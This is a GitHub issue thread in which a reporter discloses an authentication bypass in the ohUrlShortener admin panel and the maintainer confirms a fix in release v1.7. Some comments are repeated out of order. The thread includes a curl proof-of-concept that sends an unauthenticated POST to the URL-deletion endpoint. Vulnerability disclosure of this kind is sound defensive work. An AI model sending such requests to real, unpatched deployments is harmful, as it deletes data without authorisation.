barats
commented
2 years ago I'll check for this issue, TODAY.
Closed douglas-oliveira-tc closed 2 years ago
barats
commented
2 years ago I'll check for this issue, TODAY.
barats
commented
2 years ago Turns out, it was my bad. Sorry about it.
Already fixed this issue and drafted a new release: https://github.com/barats/ohUrlShortener/releases/tag/v1.7
douglas-oliveira-tc
commented
2 years ago That's great, thanks a lot!
barats
commented
2 years ago That's great, thanks a lot!
I should thank you for reporting this issue.
I was implementing your project for an internal experimentation, and found a critical issue that allows unauthenticated users to bypass auth controls.
Steps to reproduce:
curl -i -s -k -X $'POST' -H $'Host: admin.ohUrlShortener.com' -H $'Referer: http://admin.ohUrlShortener.com/admin/urls' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 18' --data-binary $'short_url=Ak3vaj58' $'http://admin.ohUrlShortener.com/admin/urls/delete'All examples were run in my environment, the address used is only for illustration purposes.